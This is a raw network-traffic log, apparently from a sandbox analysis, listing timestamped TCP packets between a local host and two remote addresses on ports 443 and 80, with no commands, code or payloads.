                                                                                                                                                                                Nov 25, 2024 14:07:19.196738958 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.196768045 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.196783066 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.200655937 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.200664997 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.200767040 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.200794935 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.200807095 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.203866959 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.203877926 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.203902006 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.203922987 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.203933001 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.207133055 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.207142115 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.207201004 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.207218885 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.211230993 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.211239100 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.211354017 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.211369038 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.214118958 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.214127064 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.214188099 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.214199066 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.218405008 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.218457937 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.218477011 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.218486071 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.218528032 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.222033024 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.222039938 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.222096920 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.222104073 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.226511002 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.226572990 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.230506897 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.230521917 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.230532885 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.230587959 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.231367111 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.231524944 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.233247995 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.233257055 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.233316898 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.233336926 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.235646963 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.235697031 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.235712051 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.238446951 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.238528013 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.238540888 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.378894091 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.379007101 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.379029036 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.382658958 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.382669926 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.382687092 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.382719040 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.382735968 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.382797003 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.385759115 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.385771990 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.385813951 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.385818005 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.385869026 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.388906002 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.388915062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.388936043 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.388978958 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.391058922 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.392929077 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.392937899 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.392965078 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.392988920 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.393002033 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.396037102 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.396045923 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.396064997 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.396087885 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.396101952 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.399372101 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.399379015 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.399497986 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.399508953 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.403345108 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.403353930 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.403400898 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.403409958 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.406549931 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.406563044 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.406611919 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.406619072 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.409653902 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.409687042 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.409709930 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.409718990 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.409763098 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.413347960 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.413357019 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.413418055 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.413424015 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.417439938 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.417514086 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.417521000 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.420428991 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.420496941 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.420507908 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.423635960 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.423707008 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.423713923 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.428081036 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.428168058 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.428175926 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.431324005 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.431390047 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.431397915 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.571846008 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.571927071 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.571953058 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.575227976 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.575242043 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.575265884 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.575289965 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.575299978 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.575347900 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.578639030 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.578646898 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.578666925 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.578723907 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.578723907 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.582623005 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.582631111 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.582655907 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.582698107 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.582710981 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.585901022 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.585908890 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.585931063 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.585966110 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.585983992 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.589303970 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.589312077 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.589339018 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.589370012 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.589385986 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.592464924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.592473030 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.592529058 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.592540979 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.595662117 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.595670938 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.595727921 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.595736980 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.599670887 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.599680901 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.599751949 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.599751949 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.599761963 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.602893114 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.602921009 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.602958918 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.602967024 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.603004932 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.606432915 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.606441975 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.606498003 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.606509924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.609698057 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.609765053 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.609782934 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.613612890 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.613682032 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.613689899 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.616753101 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.616818905 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.616827011 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.619911909 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.619983912 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.619992018 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.624108076 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.624176025 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.624186993 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.695229053 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:19.763488054 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.763626099 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.763643026 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767484903 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767499924 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767524004 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767550945 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.767563105 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.767616987 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.770740032 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.770752907 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.770776987 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.770804882 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.770816088 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.773801088 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.773814917 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.773832083 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.773883104 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.777914047 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.777929068 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.777972937 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.777983904 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.778028011 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.781075954 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.781091928 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.781112909 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.781132936 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.781145096 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.784223080 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.784235001 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.784252882 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.784282923 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.784297943 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.788518906 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.788533926 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.788580894 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.788589954 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791460991 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791493893 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791517973 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.791529894 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.791568041 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.795460939 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.795475960 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.795526028 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.795537949 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.798248053 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.798312902 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.798324108 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.802222967 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.802428007 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.802439928 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.805367947 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.805423021 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.805433989 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.808542013 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.808618069 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.808628082 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.812728882 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.812793970 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.812803030 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.815310955 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.815386057 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:19.815474987 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:19.815865993 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.815927029 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.815937996 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.935297966 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.955990076 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.956069946 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.956089020 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.958983898 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.958997011 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.959028959 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.959043980 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.959057093 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.959218025 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.963174105 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.963191032 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.963207960 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.963238955 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.963254929 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.963260889 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.966489077 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.966500044 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.966521978 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.966588020 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.966600895 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.966649055 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.970772028 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.970797062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.970815897 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.970876932 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.970876932 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.974001884 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.974018097 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.974034071 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.974081039 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.974081039 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.976914883 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.976932049 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.976978064 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.976988077 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.980660915 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.980678082 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.980720043 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:19.980731010 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.983794928 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.983810902 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:19.983860016 CET49172443192.168.2.22193.30.119.205
